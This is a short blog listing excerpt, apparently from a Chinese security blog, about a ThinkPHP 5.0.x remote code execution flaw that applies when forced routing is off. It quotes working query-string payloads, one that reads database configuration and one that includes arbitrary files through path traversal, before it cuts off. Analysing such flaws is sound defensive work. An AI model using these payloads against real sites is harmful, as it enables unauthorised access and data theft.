2021年8月16日
thinkphp5.0.x未开启强制路由rce漏洞解析
摘要: 影响版本: 5.0-5.0.23 5.1.* 5.0.* ?s=index/think\config/get&name=database.username # 获取配置信息 ?s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件 ?s=index 阅读全文
posted @ 2021-08-16 01:13 1jzz 阅读(637) 评论(0) 推荐(0) 编辑